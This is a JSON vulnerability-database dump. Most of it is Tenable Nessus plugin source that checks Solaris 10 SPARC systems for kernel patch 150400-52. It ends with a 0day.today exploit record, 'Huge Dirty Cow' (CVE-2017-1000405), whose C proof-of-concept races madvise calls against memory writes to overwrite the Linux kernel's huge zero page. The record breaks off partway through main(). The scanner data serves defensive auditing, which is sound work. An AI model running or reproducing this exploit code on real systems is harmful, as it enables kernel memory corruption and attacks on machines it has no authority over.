version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWs9brandr\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWs9brandu\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWssad\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWust1\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWust2\", version:\"11.10.0,REV=2007.07.08.17.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"FJSVhea / FJSVmdbr / FJSVpiclu / SUNWarc / SUNWarcr / SUNWbtool / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:02", "bulletinFamily": "scanner", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.", "modified": "2019-11-02T00:00:00", "id": "SOLARIS10_150400-52.NASL", "href": "https://www.tenable.com/plugins/nessus/107720", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 150400-52", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107720);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/22 9:47:14\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (sparc) : 150400-52\");\n script_summary(english:\"Check for patch 150400-52\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150400-52\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150400-52\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150400-52\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:122255\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:127980\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:137048\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:139510\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:139944\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142007\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142332\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:144540\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146808\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146838\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146848\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:147697\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148161\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148174\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148231\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148338\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148553\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148557\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148721\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148730\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148766\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148875\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149502\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149616\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149640\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149642\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149648\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149718\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149729\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150108\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150109\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150115\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150125\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150161\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150169\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150300\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150307\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150311\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150400\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150527\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150531\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150532\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150541\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150627\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150629\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150756\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150760\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150840\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150841\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151145\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151149\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151425\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151608\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152367\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152530\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152539\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"FJSVhea\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"FJSVmdbr\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"FJSVpiclu\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWdrcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWefc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWefcl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.09.15.00.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWiopc\", version:\"11.10.0,REV=2006.07.11.11.28\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.10.0,REV=2005.08.04.12.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWldomr\", version:\"11.10.0,REV=2006.10.04.00.26\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWldomu\", version:\"11.10.0,REV=2006.08.08.12.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWmdr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWmdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.14.02.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWn2cp\", version:\"11.10.0,REV=2007.07.08.21.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWpd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWpdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWpiclu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.06.03.09.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWs8brandr\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWs8brandu\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWs9brandr\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWs9brandu\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWssad\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWust1\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWust2\", version:\"11.10.0,REV=2007.07.08.17.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-52\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"FJSVhea / FJSVmdbr / FJSVpiclu / SUNWarc / SUNWarcr / SUNWbtool / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-04T19:03:44", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-12-01T00:00:00", "published": "2017-12-01T00:00:00", "href": "https://0day.today/exploit/description/29087", "id": "1337DAY-ID-29087", "title": "Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page Exploit", "type": "zdt", "sourceData": "// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0\r\n// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC\r\n// Author Note: Before running, make sure to set transparent huge pages to \"always\": \r\n// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`\r\n//\r\n \r\n//\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n \r\n#define _GNU_SOURCE\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n \r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n \r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n \r\ntypedef void * (*pthread_proc)(void *);\r\n \r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n \r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n \r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n \r\n args->stop = 1;\r\n return NULL;\r\n}\r\n \r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n \r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n \r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid 